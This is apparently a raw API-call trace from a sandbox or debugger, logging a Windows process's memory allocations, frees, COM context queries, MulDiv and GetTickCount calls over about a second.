	[0046.496] malloc (_Size=0x208) returned 0xdfca0
	[0046.496] ??2@YAPEAX_K@Z () returned 0xdd750
	[0046.496] ??2@YAPEAX_K@Z () returned 0xde0d0
	[0046.497] ??2@YAPEAX_K@Z () returned 0xdfeb0
	[0046.497] ??2@YAPEAX_K@Z () returned 0xdff30
	[0046.498] ??2@YAPEAX_K@Z () returned 0xdea50
	[0046.498] malloc (_Size=0x20) returned 0xded40
	[0046.498] malloc (_Size=0x288) returned 0xded70
	[0046.498] realloc (_Block=0x0, _Size=0x140) returned 0x2b0810
	[0046.498] realloc (_Block=0xded40, _Size=0x40) returned 0xdf000
	[0046.498] realloc (_Block=0x2b0810, _Size=0x280) returned 0x2b0810
	[0046.498] malloc (_Size=0x508) returned 0x2b0aa0
	[0046.498] realloc (_Block=0xdf000, _Size=0x80) returned 0x2b0fb0
	[0046.498] realloc (_Block=0x2b0810, _Size=0x500) returned 0x2b1040
	[0046.498] malloc (_Size=0xa08) returned 0x2b1550
	[0046.498] realloc (_Block=0x2b0fb0, _Size=0x100) returned 0x2b0810
	[0046.498] realloc (_Block=0x2b1040, _Size=0xa00) returned 0x2b1f60
	[0046.499] malloc (_Size=0x1408) returned 0x26dfd0
	[0046.499] realloc (_Block=0x2b0810, _Size=0x200) returned 0x2b0810
	[0046.499] realloc (_Block=0x2b1f60, _Size=0x1400) returned 0x26f3e0
	[0046.500] ??2@YAPEAX_K@Z () returned 0x2b0fb0
	[0046.502] ??2@YAPEAX_K@Z () returned 0x2b0a20
	[0046.502] ??2@YAPEAX_K@Z () returned 0x2b1090
	[0046.502] malloc (_Size=0x80) returned 0x2b1140
	[0046.502] malloc (_Size=0x108) returned 0xd8060
	[0046.502] ??2@YAPEAX_K@Z () returned 0x2b11d0
	[0046.503] malloc (_Size=0x18) returned 0xdffb0
	[0046.517] ??2@YAPEAX_K@Z () returned 0x2b12b0
	[0046.517] ??2@YAPEAX_K@Z () returned 0x2b2520
	[0046.517] malloc (_Size=0x80) returned 0x2b1360
	[0046.517] malloc (_Size=0x108) returned 0xd8170
	[0046.519] ??2@YAPEAX_K@Z () returned 0x2b1480
	[0046.528] ??2@YAPEAX_K@Z () returned 0x2b2810
	[0046.529] ??2@YAPEAX_K@Z () returned 0x2b28f0
	[0046.529] ??2@YAPEAX_K@Z () returned 0x2b2970
	[0046.529] malloc (_Size=0x80) returned 0x2b2a20
	[0046.529] malloc (_Size=0x108) returned 0xd8390
	[0046.529] ??2@YAPEAX_K@Z () returned 0x2b2cc0
	[0046.529] malloc (_Size=0x18) returned 0x2b1530
	[0046.529] ??2@YAPEAX_K@Z () returned 0x2b2da0
	[0046.529] ??2@YAPEAX_K@Z () returned 0x2b2e20
	[0046.529] malloc (_Size=0x80) returned 0x2b2ed0
	[0046.529] malloc (_Size=0x108) returned 0xd84a0
	[0046.529] ??2@YAPEAX_K@Z () returned 0x2707f0
	[0046.530] malloc (_Size=0x30) returned 0xdf000
	[0046.534] ??2@YAPEAX_K@Z () returned 0x2708d0
	[0046.534] realloc (_Block=0x0, _Size=0xa0) returned 0x270990
	[0046.534] ??2@YAPEAX_K@Z () returned 0xded40
	[0046.534] ??2@YAPEAX_K@Z () returned 0x2b2f60
	[0046.534] realloc (_Block=0x0, _Size=0xc8) returned 0x270a40
	[0046.535] ??2@YAPEAX_K@Z () returned 0x2b2f60
	[0046.535] malloc (_Size=0x1008) returned 0x270b10
	[0046.535] ??2@YAPEAX_K@Z () returned 0x271b20
	[0046.535] ??2@YAPEAX_K@Z () returned 0x2b2fa0
	[0046.536] free (_Block=0x270b10) 
	[0046.536] ??3@YAXPEAX@Z () returned 0x1dd30701
	[0046.536] free (_Block=0xdf040) 
	[0046.536] free (_Block=0x271b20) 
	[0046.536] free (_Block=0x271ee0) 
	[0046.536] free (_Block=0x271cd0) 
	[0046.536] free (_Block=0xd85b0) 
	[0046.536] ??2@YAPEAX_K@Z () returned 0x270b10
	[0046.536] ??2@YAPEAX_K@Z () returned 0x270b70
	[0046.537] ??2@YAPEAX_K@Z () returned 0x270a40
	[0046.537] ??2@YAPEAX_K@Z () returned 0x270c50
	[0046.537] malloc (_Size=0x18) returned 0xdf040
	[0046.537] ??2@YAPEAX_K@Z () returned 0x270d30
	[0046.537] malloc (_Size=0x80) returned 0x270de0
	[0046.537] malloc (_Size=0x108) returned 0xd85b0
	[0046.537] ??2@YAPEAX_K@Z () returned 0x270e70
	[0046.537] malloc (_Size=0x80) returned 0x270f20
	[0046.537] malloc (_Size=0x108) returned 0xd86c0
	[0046.537] realloc (_Block=0x0, _Size=0xc8) returned 0x270fb0
	[0046.538] ??2@YAPEAX_K@Z () returned 0x2b2f60
	[0046.538] malloc (_Size=0x1008) returned 0x271080
	[0046.538] ??2@YAPEAX_K@Z () returned 0x272090
	[0046.538] ??2@YAPEAX_K@Z () returned 0x270ae0
	[0046.538] free (_Block=0x271080) 
	[0046.538] ??3@YAXPEAX@Z () returned 0x1dd30701
	[0046.538] free (_Block=0x270ac0) 
	[0046.538] free (_Block=0x272090) 
	[0046.538] free (_Block=0x272770) 
	[0046.538] free (_Block=0x272560) 
	[0046.538] free (_Block=0xd87d0) 
	[0046.538] ??2@YAPEAX_K@Z () returned 0x272260
	[0046.538] ??2@YAPEAX_K@Z () returned 0x271080
	[0046.540] ??2@YAPEAX_K@Z () returned 0x271160
	[0046.541] malloc (_Size=0x30) returned 0x2b2f60
	[0046.541] ??2@YAPEAX_K@Z () returned 0x271240
	[0046.541] malloc (_Size=0x18) returned 0x270ac0
	[0046.541] ??2@YAPEAX_K@Z () returned 0x270fb0
	[0046.541] malloc (_Size=0x80) returned 0x271320
	[0046.541] malloc (_Size=0x108) returned 0xd87d0
	[0046.542] ??2@YAPEAX_K@Z () returned 0x2713b0
	[0046.542] ??2@YAPEAX_K@Z () returned 0x271420
	[0046.542] ??2@YAPEAX_K@Z () returned 0x2714a0
	[0046.542] malloc (_Size=0x208) returned 0x271520
	[0046.542] ??2@YAPEAX_K@Z () returned 0x271730
	[0046.543] ??2@YAPEAX_K@Z () returned 0x2717b0
	[0046.543] ??2@YAPEAX_K@Z () returned 0x271870
	[0046.543] ??2@YAPEAX_K@Z () returned 0x2719b0
	[0046.544] ??2@YAPEAX_K@Z () returned 0x271af0
	[0046.544] ??2@YAPEAX_K@Z () returned 0x271b80
	[0046.544] ??2@YAPEAX_K@Z () returned 0x271c10
	[0046.544] malloc (_Size=0x80) returned 0x271cc0
	[0046.544] malloc (_Size=0x108) returned 0xd88e0
	[0046.544] ??2@YAPEAX_K@Z () returned 0x271d50
	[0046.544] ??2@YAPEAX_K@Z () returned 0x271e00
	[0046.544] malloc (_Size=0x80) returned 0x271eb0
	[0046.544] malloc (_Size=0x108) returned 0xd89f0
	[0046.545] realloc (_Block=0x0, _Size=0x64) returned 0x271f40
	[0046.545] realloc (_Block=0x0, _Size=0x2ac) returned 0x272560
	[0046.546] ??2@YAPEAX_K@Z () returned 0x272560
	[0046.546] free (_Block=0x271f40) 
	[0046.546] ??2@YAPEAX_K@Z () returned 0x271f40
	[0046.547] ??2@YAPEAX_K@Z () returned 0x271ff0
	[0046.591] ??2@YAPEAX_K@Z () returned 0x2729f0
	[0046.591] ??2@YAPEAX_K@Z () returned 0x272ad0
	[0046.591] malloc (_Size=0x80) returned 0x274aa0
	[0046.591] malloc (_Size=0x108) returned 0xd8b00
	[0046.592] ??2@YAPEAX_K@Z () returned 0x2722c0
	[0046.593] ??2@YAPEAX_K@Z () returned 0x2720a0
	[0046.594] ??2@YAPEAX_K@Z () returned 0x274b30
	[0046.595] ??2@YAPEAX_K@Z () returned 0x274b60
	[0046.596] ??2@YAPEAX_K@Z () returned 0x274b90
	[0046.596] ??2@YAPEAX_K@Z () returned 0x274bc0
	[0046.597] ??2@YAPEAX_K@Z () returned 0x275540
	[0046.598] ??2@YAPEAX_K@Z () returned 0x275570
	[0046.598] ??2@YAPEAX_K@Z () returned 0x2755a0
	[0046.608] ??2@YAPEAX_K@Z () returned 0x2755d0
	[0046.608] ??2@YAPEAX_K@Z () returned 0x275600
	[0046.609] ??2@YAPEAX_K@Z () returned 0x275630
	[0046.610] ??2@YAPEAX_K@Z () returned 0x275660
	[0046.611] ??2@YAPEAX_K@Z () returned 0x275690
	[0046.612] ??2@YAPEAX_K@Z () returned 0x2756c0
	[0046.613] ??2@YAPEAX_K@Z () returned 0x2756f0
	[0046.614] ??2@YAPEAX_K@Z () returned 0x275720
	[0046.614] ??2@YAPEAX_K@Z () returned 0x275780
	[0046.615] ??2@YAPEAX_K@Z () returned 0x2757b0
	[0046.616] ??2@YAPEAX_K@Z () returned 0x2757e0
	[0046.617] ??2@YAPEAX_K@Z () returned 0x275810
	[0046.618] ??2@YAPEAX_K@Z () returned 0x275840
	[0046.618] ??2@YAPEAX_K@Z () returned 0x275870
	[0046.619] ??2@YAPEAX_K@Z () returned 0x2758a0
	[0046.620] ??2@YAPEAX_K@Z () returned 0x2758d0
	[0046.621] ??2@YAPEAX_K@Z () returned 0x275900
	[0046.621] ??2@YAPEAX_K@Z () returned 0x275930
	[0046.623] ??2@YAPEAX_K@Z () returned 0x275960
	[0046.623] ??2@YAPEAX_K@Z () returned 0x275990
	[0046.624] ??2@YAPEAX_K@Z () returned 0x2759c0
	[0046.625] ??2@YAPEAX_K@Z () returned 0x2759f0
	[0046.626] ??2@YAPEAX_K@Z () returned 0x275a20
	[0046.626] ??2@YAPEAX_K@Z () returned 0x275a50
	[0046.629] ??2@YAPEAX_K@Z () returned 0x275a80
	[0046.630] ??2@YAPEAX_K@Z () returned 0x275ab0
	[0046.631] ??2@YAPEAX_K@Z () returned 0x275ae0
	[0046.631] ??2@YAPEAX_K@Z () returned 0x275f50
	[0046.632] ??2@YAPEAX_K@Z () returned 0x275b10
	[0046.633] ??2@YAPEAX_K@Z () returned 0x275b40
	[0046.634] ??2@YAPEAX_K@Z () returned 0x275b70
	[0046.638] ??2@YAPEAX_K@Z () returned 0x275ba0
	[0046.639] ??2@YAPEAX_K@Z () returned 0x275bd0
	[0046.640] ??2@YAPEAX_K@Z () returned 0x275c00
	[0046.641] ??2@YAPEAX_K@Z () returned 0x275c30
	[0046.642] ??2@YAPEAX_K@Z () returned 0x275c60
	[0046.642] ??2@YAPEAX_K@Z () returned 0x275c90
	[0046.643] ??2@YAPEAX_K@Z () returned 0x275cc0
	[0046.644] ??2@YAPEAX_K@Z () returned 0x275cf0
	[0046.645] ??2@YAPEAX_K@Z () returned 0x275d20
	[0046.646] ??2@YAPEAX_K@Z () returned 0x275d50
	[0046.646] ??2@YAPEAX_K@Z () returned 0x275d80
	[0046.702] ??2@YAPEAX_K@Z () returned 0x275db0
	[0046.703] ??2@YAPEAX_K@Z () returned 0x275de0
	[0046.704] ??2@YAPEAX_K@Z () returned 0x275e10
	[0046.705] ??2@YAPEAX_K@Z () returned 0x275e40
	[0046.706] ??2@YAPEAX_K@Z () returned 0x275e70
	[0046.706] ??2@YAPEAX_K@Z () returned 0x275ea0
	[0046.707] ??2@YAPEAX_K@Z () returned 0x275ed0
	[0046.708] ??2@YAPEAX_K@Z () returned 0x275f00
	[0046.709] ??2@YAPEAX_K@Z () returned 0x276900
	[0046.710] ??2@YAPEAX_K@Z () returned 0x276930
	[0046.711] ??2@YAPEAX_K@Z () returned 0x276960
	[0046.712] ??2@YAPEAX_K@Z () returned 0x276990
	[0046.712] ??2@YAPEAX_K@Z () returned 0x2769c0
	[0046.713] ??2@YAPEAX_K@Z () returned 0x2769f0
	[0046.714] ??2@YAPEAX_K@Z () returned 0x276a20
	[0046.715] ??2@YAPEAX_K@Z () returned 0x276a50
	[0046.715] ??2@YAPEAX_K@Z () returned 0x2770d0
	[0046.716] ??2@YAPEAX_K@Z () returned 0x276a80
	[0046.717] ??2@YAPEAX_K@Z () returned 0x276ab0
	[0046.717] ??2@YAPEAX_K@Z () returned 0x276ae0
	[0046.718] CoGetObjectContext (in: riid=0x7fee3376350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2577f8 | out: ppv=0x2577f8*=0x40f420) returned 0x0
	[0046.720] ??3@YAXPEAX@Z () returned 0x1dd30701
	[0046.720] ??3@YAXPEAX@Z () returned 0x1dd30701
	[0046.720] ??3@YAXPEAX@Z () returned 0x1dd30701
	[0046.720] free (_Block=0x2720e0) 
	[0046.720] ??3@YAXPEAX@Z () returned 0x1dd30701
	[0046.720] ??3@YAXPEAX@Z () returned 0x1dd30701
	[0046.720] ??3@YAXPEAX@Z () returned 0x1dd30701
	[0046.721] free (_Block=0xdf040) 
	[0046.721] free (_Block=0x270f20) 
	[0046.721] free (_Block=0xd86c0) 
	[0046.721] ??3@YAXPEAX@Z () returned 0x1dd30701
	[0046.721] ??3@YAXPEAX@Z () returned 0x1dd30701
	[0046.721] ??3@YAXPEAX@Z () returned 0x1dd30701
	[0046.721] free (_Block=0x2722f0) 
	[0046.721] ??3@YAXPEAX@Z () returned 0x1dd30701
	[0046.721] ??3@YAXPEAX@Z () returned 0x1dd30701
	[0046.721] ??3@YAXPEAX@Z () returned 0x1dd30701
	[0046.721] ??3@YAXPEAX@Z () returned 0x1dd30701
	[0046.721] free (_Block=0xdffb0) 
	[0046.721] ??3@YAXPEAX@Z () returned 0x1dd30701
	[0046.721] free (_Block=0x2b1140) 
	[0046.721] free (_Block=0xd8060) 
	[0046.721] ??3@YAXPEAX@Z () returned 0x1dd30701
	[0046.721] ??3@YAXPEAX@Z () returned 0x1dd30701
	[0046.721] MulDiv (nNumber=111, nNumerator=100, nDenominator=512) returned 22
	[0046.721] IUnknown:Release (This=0x40f420) returned 0x1
	[0046.735] GetTickCount () returned 0x1ce84
	[0046.736] ??2@YAPEAX_K@Z () returned 0x276b10
	[0046.736] ??2@YAPEAX_K@Z () returned 0x276b40
	[0046.737] ??2@YAPEAX_K@Z () returned 0x276b70
	[0046.738] ??2@YAPEAX_K@Z () returned 0x276ba0
	[0046.738] ??2@YAPEAX_K@Z () returned 0x276bd0
	[0046.739] ??2@YAPEAX_K@Z () returned 0x276c00
	[0046.740] ??2@YAPEAX_K@Z () returned 0x276c30
	[0046.741] ??2@YAPEAX_K@Z () returned 0x276c60
	[0046.742] ??2@YAPEAX_K@Z () returned 0x276c90
	[0046.743] ??2@YAPEAX_K@Z () returned 0x276cc0
	[0046.744] ??2@YAPEAX_K@Z () returned 0x276cf0
	[0046.744] ??2@YAPEAX_K@Z () returned 0x276d20
	[0046.745] ??2@YAPEAX_K@Z () returned 0x276d50
	[0046.746] ??2@YAPEAX_K@Z () returned 0x276d80
	[0046.747] ??2@YAPEAX_K@Z () returned 0x276db0
	[0046.748] ??2@YAPEAX_K@Z () returned 0x276de0
	[0046.956] ??2@YAPEAX_K@Z () returned 0x276e10
	[0046.957] ??2@YAPEAX_K@Z () returned 0x276e40
	[0046.958] ??2@YAPEAX_K@Z () returned 0x276e70
	[0046.959] ??2@YAPEAX_K@Z () returned 0x276ea0
	[0046.960] ??2@YAPEAX_K@Z () returned 0x276ed0
	[0046.961] ??2@YAPEAX_K@Z () returned 0x276f00
	[0046.962] ??2@YAPEAX_K@Z () returned 0x276f30
	[0046.962] ??2@YAPEAX_K@Z () returned 0x276f60
	[0046.964] ??2@YAPEAX_K@Z () returned 0x276f90
	[0046.964] ??2@YAPEAX_K@Z () returned 0x276fc0
	[0046.965] ??2@YAPEAX_K@Z () returned 0x276ff0
	[0046.966] ??2@YAPEAX_K@Z () returned 0x277020
	[0046.966] ??2@YAPEAX_K@Z () returned 0x277050
	[0046.967] ??2@YAPEAX_K@Z () returned 0x277080
	[0046.967] ??2@YAPEAX_K@Z () returned 0x277a80
	[0046.968] ??2@YAPEAX_K@Z () returned 0x277ab0
	[0046.968] ??2@YAPEAX_K@Z () returned 0x277ae0
	[0046.969] ??2@YAPEAX_K@Z () returned 0x277b10
	[0046.969] ??2@YAPEAX_K@Z () returned 0x277b40
	[0046.970] ??2@YAPEAX_K@Z () returned 0x277b70
	[0046.970] ??2@YAPEAX_K@Z () returned 0x277ba0
	[0046.971] ??2@YAPEAX_K@Z () returned 0x277bd0
	[0046.971] ??2@YAPEAX_K@Z () returned 0x277c00
	[0046.972] ??2@YAPEAX_K@Z () returned 0x277c30
	[0046.972] ??2@YAPEAX_K@Z () returned 0x277c60
	[0046.972] ??2@YAPEAX_K@Z () returned 0x277c90
	[0046.972] ??2@YAPEAX_K@Z () returned 0x277cc0
	[0046.973] ??2@YAPEAX_K@Z () returned 0x277cf0
	[0046.973] ??2@YAPEAX_K@Z () returned 0x277d20
	[0046.973] ??2@YAPEAX_K@Z () returned 0x277d50
	[0046.973] ??2@YAPEAX_K@Z () returned 0x277d80
	[0046.974] ??2@YAPEAX_K@Z () returned 0x277db0
	[0046.974] ??2@YAPEAX_K@Z () returned 0x277de0
	[0046.974] ??2@YAPEAX_K@Z () returned 0x277e10
	[0046.974] ??2@YAPEAX_K@Z () returned 0x277e40
	[0046.974] ??2@YAPEAX_K@Z () returned 0x277e70
	[0046.975] ??2@YAPEAX_K@Z () returned 0x277ea0
	[0046.975] ??2@YAPEAX_K@Z () returned 0x277ed0
	[0046.975] ??2@YAPEAX_K@Z () returned 0x277f00
	[0046.975] ??2@YAPEAX_K@Z () returned 0x277f30
	[0046.976] ??2@YAPEAX_K@Z () returned 0x277f60
	[0046.976] ??2@YAPEAX_K@Z () returned 0x277f90
	[0046.976] ??2@YAPEAX_K@Z () returned 0x272b80
	[0046.976] malloc (_Size=0x208) returned 0x2b1090
	[0047.040] ??2@YAPEAX_K@Z () returned 0x271060
	[0047.040] ??2@YAPEAX_K@Z () returned 0x271420
	[0047.043] ??2@YAPEAX_K@Z () returned 0x270e70
	[0047.043] ??2@YAPEAX_K@Z () returned 0x272c30
	[0047.043] ??2@YAPEAX_K@Z () returned 0x272ce0
	[0047.043] malloc (_Size=0x80) returned 0x270f00
	[0047.044] malloc (_Size=0x108) returned 0xd8060
	[0047.044] ??2@YAPEAX_K@Z () returned 0x272d90
	[0047.044] malloc (_Size=0x80) returned 0x2719b0
	[0047.044] malloc (_Size=0x108) returned 0xd86c0
	[0047.044] ??2@YAPEAX_K@Z () returned 0x278250
	[0047.044] ??2@YAPEAX_K@Z () returned 0x277f90
	[0047.045] ??2@YAPEAX_K@Z () returned 0x272e40
	[0047.045] ??2@YAPEAX_K@Z () returned 0x277f90
	[0047.045] ??2@YAPEAX_K@Z () returned 0x277fc0
	[0047.045] ??2@YAPEAX_K@Z () returned 0x277fc0
	[0047.046] ??2@YAPEAX_K@Z () returned 0x277ff0
	[0047.046] ??2@YAPEAX_K@Z () returned 0x278020
	[0047.046] ??2@YAPEAX_K@Z () returned 0x278020
	[0047.046] ??2@YAPEAX_K@Z () returned 0x278050
	[0047.046] ??2@YAPEAX_K@Z () returned 0x278080
	[0047.047] ??2@YAPEAX_K@Z () returned 0x278080
	[0047.047] ??2@YAPEAX_K@Z () returned 0x2780b0
	[0047.047] ??2@YAPEAX_K@Z () returned 0x2780e0
	[0047.047] ??2@YAPEAX_K@Z () returned 0x2780e0
	[0047.047] ??2@YAPEAX_K@Z () returned 0x278110
	[0047.048] ??2@YAPEAX_K@Z () returned 0x278140
	[0047.048] ??2@YAPEAX_K@Z () returned 0x278140
	[0047.048] ??2@YAPEAX_K@Z () returned 0x278170
	[0047.048] ??2@YAPEAX_K@Z () returned 0x2781a0
	[0047.048] ??2@YAPEAX_K@Z () returned 0x2781a0
	[0047.049] ??2@YAPEAX_K@Z () returned 0x2781d0
	[0047.049] ??2@YAPEAX_K@Z () returned 0x278200
	[0047.049] ??2@YAPEAX_K@Z () returned 0x278200
	[0047.049] ??2@YAPEAX_K@Z () returned 0x278c00
	[0047.049] ??2@YAPEAX_K@Z () returned 0x278c30
	[0047.050] ??2@YAPEAX_K@Z () returned 0x278c30
	[0047.050] ??2@YAPEAX_K@Z () returned 0x278c60
	[0047.050] ??2@YAPEAX_K@Z () returned 0x278c90
	[0047.050] ??2@YAPEAX_K@Z () returned 0x278c90
	[0047.051] ??2@YAPEAX_K@Z () returned 0x278cc0
	[0047.051] ??2@YAPEAX_K@Z () returned 0x278cf0
	[0047.051] ??2@YAPEAX_K@Z () returned 0x278cf0
	[0047.052] ??2@YAPEAX_K@Z () returned 0x278d20
	[0047.052] ??2@YAPEAX_K@Z () returned 0x278d50
	[0047.052] ??2@YAPEAX_K@Z () returned 0x278d50
	[0047.052] ??2@YAPEAX_K@Z () returned 0x278d80
	[0047.052] ??2@YAPEAX_K@Z () returned 0x278db0
	[0047.053] ??2@YAPEAX_K@Z () returned 0x278db0
	[0047.053] ??2@YAPEAX_K@Z () returned 0x278de0
	[0047.053] ??2@YAPEAX_K@Z () returned 0x2793d0
	[0047.053] ??2@YAPEAX_K@Z () returned 0x278e10
	[0047.054] ??2@YAPEAX_K@Z () returned 0x278e10
	[0047.054] ??2@YAPEAX_K@Z () returned 0x278e40
	[0047.054] ??2@YAPEAX_K@Z () returned 0x278e70
	[0047.054] ??2@YAPEAX_K@Z () returned 0x278e70
	[0047.054] ??2@YAPEAX_K@Z () returned 0x278ea0
	[0047.055] ??2@YAPEAX_K@Z () returned 0x278ed0
	[0047.123] ??2@YAPEAX_K@Z () returned 0x278ed0
	[0047.123] ??2@YAPEAX_K@Z () returned 0x278f00
	[0047.124] ??2@YAPEAX_K@Z () returned 0x278f30
	[0047.124] ??2@YAPEAX_K@Z () returned 0x278f30
	[0047.124] ??2@YAPEAX_K@Z () returned 0x278f60
	[0047.124] ??2@YAPEAX_K@Z () returned 0x278f90
	[0047.124] ??2@YAPEAX_K@Z () returned 0x278f90
	[0047.125] ??2@YAPEAX_K@Z () returned 0x278fc0
	[0047.125] ??2@YAPEAX_K@Z () returned 0x278ff0
	[0047.125] ??2@YAPEAX_K@Z () returned 0x278ff0
	[0047.125] ??2@YAPEAX_K@Z () returned 0x279020
	[0047.125] ??2@YAPEAX_K@Z () returned 0x279050
	[0047.126] ??2@YAPEAX_K@Z () returned 0x279050
	[0047.126] ??2@YAPEAX_K@Z () returned 0x279080
	[0047.126] ??2@YAPEAX_K@Z () returned 0x2790b0
	[0047.126] ??2@YAPEAX_K@Z () returned 0x2790b0
	[0047.127] ??2@YAPEAX_K@Z () returned 0x2790e0
	[0047.127] ??2@YAPEAX_K@Z () returned 0x279110
	[0047.127] ??2@YAPEAX_K@Z () returned 0x279110
	[0047.127] ??2@YAPEAX_K@Z () returned 0x279140
	[0047.127] ??2@YAPEAX_K@Z () returned 0x279170
	[0047.128] ??2@YAPEAX_K@Z () returned 0x279170
	[0047.128] ??2@YAPEAX_K@Z () returned 0x2791a0
	[0047.128] ??2@YAPEAX_K@Z () returned 0x2791d0
	[0047.128] ??2@YAPEAX_K@Z () returned 0x2791d0
	[0047.128] ??2@YAPEAX_K@Z () returned 0x279200
	[0047.129] ??2@YAPEAX_K@Z () returned 0x279230
	[0047.129] ??2@YAPEAX_K@Z () returned 0x279230
	[0047.129] ??2@YAPEAX_K@Z () returned 0x279260
	[0047.129] ??2@YAPEAX_K@Z () returned 0x279d50
	[0047.130] ??2@YAPEAX_K@Z () returned 0x279290
	[0047.130] ??2@YAPEAX_K@Z () returned 0x279290
	[0047.130] ??2@YAPEAX_K@Z () returned 0x2792c0
	[0047.130] ??2@YAPEAX_K@Z () returned 0x2792f0
	[0047.131] ??2@YAPEAX_K@Z () returned 0x2792f0
	[0047.131] ??2@YAPEAX_K@Z () returned 0x279320
	[0047.131] ??2@YAPEAX_K@Z () returned 0x279350
	[0047.132] ??2@YAPEAX_K@Z () returned 0x279350
	[0047.132] ??2@YAPEAX_K@Z () returned 0x279380
	[0047.132] ??2@YAPEAX_K@Z () returned 0x27a700
	[0047.132] ??2@YAPEAX_K@Z () returned 0x27a700
	[0047.132] ??2@YAPEAX_K@Z () returned 0x27a730
	[0047.133] ??2@YAPEAX_K@Z () returned 0x27a760
	[0047.133] ??2@YAPEAX_K@Z () returned 0x27a760
	[0047.133] ??2@YAPEAX_K@Z () returned 0x27a790
	[0047.133] ??2@YAPEAX_K@Z () returned 0x27a7c0
	[0047.133] ??2@YAPEAX_K@Z () returned 0x27a7c0
	[0047.134] ??2@YAPEAX_K@Z () returned 0x27a7f0
	[0047.134] ??2@YAPEAX_K@Z () returned 0x27a820
	[0047.134] ??2@YAPEAX_K@Z () returned 0x27a820
	[0047.134] ??2@YAPEAX_K@Z () returned 0x27a850
	[0047.134] ??2@YAPEAX_K@Z () returned 0x27a880
	[0047.135] ??2@YAPEAX_K@Z () returned 0x27a880
	[0047.135] ??2@YAPEAX_K@Z () returned 0x27a8b0
	[0047.135] ??2@YAPEAX_K@Z () returned 0x27a8e0
	[0047.135] ??2@YAPEAX_K@Z () returned 0x27a8e0
	[0047.135] ??2@YAPEAX_K@Z () returned 0x27a910
	[0047.136] ??2@YAPEAX_K@Z () returned 0x27a940
	[0047.136] ??2@YAPEAX_K@Z () returned 0x27a940
	[0047.136] ??2@YAPEAX_K@Z () returned 0x27a970
	[0047.136] ??2@YAPEAX_K@Z () returned 0x27a9a0
	[0047.136] ??2@YAPEAX_K@Z () returned 0x27a9a0
	[0047.137] ??2@YAPEAX_K@Z () returned 0x27a9d0
	[0047.137] ??2@YAPEAX_K@Z () returned 0x27aa00
	[0047.137] ??2@YAPEAX_K@Z () returned 0x27aa00
	[0047.137] ??2@YAPEAX_K@Z () returned 0x27aa30
	[0047.137] ??2@YAPEAX_K@Z () returned 0x27aa60
	[0047.138] ??2@YAPEAX_K@Z () returned 0x27aa60
	[0047.138] ??2@YAPEAX_K@Z () returned 0x27aa90
	[0047.138] ??2@YAPEAX_K@Z () returned 0x27aed0
	[0047.138] ??2@YAPEAX_K@Z () returned 0x27aac0
	[0047.139] ??2@YAPEAX_K@Z () returned 0x27aac0
	[0047.139] ??2@YAPEAX_K@Z () returned 0x27aaf0
	[0047.139] ??2@YAPEAX_K@Z () returned 0x27ab20
	[0047.139] ??2@YAPEAX_K@Z () returned 0x27ab20
	[0047.139] ??2@YAPEAX_K@Z () returned 0x27ab50
	[0047.140] CoGetObjectContext (in: riid=0x7fee3376350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x259588 | out: ppv=0x259588*=0x40f420) returned 0x0
	[0047.142] ??3@YAXPEAX@Z () returned 0x1
	[0047.142] ??3@YAXPEAX@Z () returned 0xb00500001
	[0047.142] ??3@YAXPEAX@Z () returned 0xc004d0001
	[0047.142] ??3@YAXPEAX@Z () returned 0xd004a0001
	[0047.142] ??3@YAXPEAX@Z () returned 0xe00470001
	[0047.142] ??3@YAXPEAX@Z () returned 0xf00440001
	[0047.142] ??3@YAXPEAX@Z () returned 0x1000410001
	[0047.142] ??3@YAXPEAX@Z () returned 0x11003e0001
	[0047.142] ??3@YAXPEAX@Z () returned 0x12003b0001
	[0047.142] ??3@YAXPEAX@Z () returned 0x1300380001
	[0047.142] ??3@YAXPEAX@Z () returned 0x1400350001
	[0047.142] ??3@YAXPEAX@Z () returned 0x1500320001
	[0047.143] ??3@YAXPEAX@Z () returned 0x16002f0001
	[0047.143] ??3@YAXPEAX@Z () returned 0x17002c0001
	[0047.143] ??3@YAXPEAX@Z () returned 0x1800290001
	[0047.143] ??3@YAXPEAX@Z () returned 0x1900260001
	[0047.143] ??3@YAXPEAX@Z () returned 0x1a00230001
	[0047.143] ??3@YAXPEAX@Z () returned 0x1b00200001
	[0047.143] ??3@YAXPEAX@Z () returned 0x1c001d0001
	[0047.143] ??3@YAXPEAX@Z () returned 0x1d001a0001
	[0047.143] ??3@YAXPEAX@Z () returned 0x1e00170001
	[0047.143] ??3@YAXPEAX@Z () returned 0x1f00140001
	[0047.143] ??3@YAXPEAX@Z () returned 0x2000110001
	[0047.143] ??3@YAXPEAX@Z () returned 0x21000e0001
	[0047.143] ??3@YAXPEAX@Z () returned 0x1
	[0047.143] ??3@YAXPEAX@Z () returned 0x200200001
	[0047.143] ??3@YAXPEAX@Z () returned 0x3001d0001
	[0047.144] ??3@YAXPEAX@Z () returned 0x22000b0001
	[0047.144] ??3@YAXPEAX@Z () returned 0x4001a0001
	[0047.144] ??3@YAXPEAX@Z () returned 0x500170001
	[0047.144] ??3@YAXPEAX@Z () returned 0x2300080001
	[0047.144] ??3@YAXPEAX@Z () returned 0x600140001
	[0047.144] ??3@YAXPEAX@Z () returned 0x700110001
	[0047.144] ??3@YAXPEAX@Z () returned 0x2400050001
	[0047.144] ??3@YAXPEAX@Z () returned 0x8000e0001
	[0047.144] ??3@YAXPEAX@Z () returned 0x9000b0001
	[0047.144] ??3@YAXPEAX@Z () returned 0xa00080001
	[0047.144] ??3@YAXPEAX@Z () returned 0xb00050001
	[0047.144] ??3@YAXPEAX@Z () returned 0xc007a0001
	[0047.145] MulDiv (nNumber=491, nNumerator=100, nDenominator=917) returned 54
	[0047.145] IUnknown:Release (This=0x40f420) returned 0x1
	[0047.145] GetTickCount () returned 0x1d01a
	[0047.145] ??2@YAPEAX_K@Z () returned 0x277a80
	[0047.146] ??2@YAPEAX_K@Z () returned 0x277a80
	[0047.146] ??2@YAPEAX_K@Z () returned 0x277ab0
	[0047.146] ??2@YAPEAX_K@Z () returned 0x277ae0
	[0047.146] ??2@YAPEAX_K@Z () returned 0x277ae0
	[0047.147] ??2@YAPEAX_K@Z () returned 0x277b10
	[0047.147] ??2@YAPEAX_K@Z () returned 0x277b40
	[0047.147] ??2@YAPEAX_K@Z () returned 0x277b40
